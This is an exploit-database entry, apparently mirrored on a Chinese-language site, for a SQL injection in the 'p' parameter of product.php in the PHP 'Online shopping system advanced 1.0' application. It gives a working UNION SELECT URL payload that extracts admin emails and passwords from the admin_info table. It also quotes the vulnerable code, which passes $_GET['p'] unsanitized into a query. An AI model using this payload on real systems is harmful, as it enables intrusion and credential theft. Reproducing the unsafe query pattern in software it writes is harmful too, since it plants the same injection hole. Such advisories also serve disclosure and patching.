Online shopping system advanced 1.0 – ‘p’ SQL Injection

• Exploit Database
• 127 阅读

• 作者： Majid kalantari
  日期： 2020-04-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48383/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26

  # Exploit Title: Online shopping system advanced 1.0 - 'p' SQL Injection # Exploit Author : Majid kalantari # Date: 2020-04-26 # Vendor Homepage : https://github.com/PuneethReddyHC/online-shopping-system-advanced # Software link: https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip # Version: - # Tested on: Windows 10 # CVE: N/A ===============================================   # vulnerable file: product.php   # vulnerable parameter : p   # payload : http://127.0.0.1:8081/phps/product.php?p=-10+union+select+1,2,3,concat(admin_email,%27----%27,admin_password),5,6,7,8+from+admin_info%23# !   #Description: ($product_id input is not safe)   Line 46: $product_id = $_GET['p']; $sql = " SELECT * FROM products "; $sql = " SELECT * FROM products WHERE product_id = $product_id"; ===============================================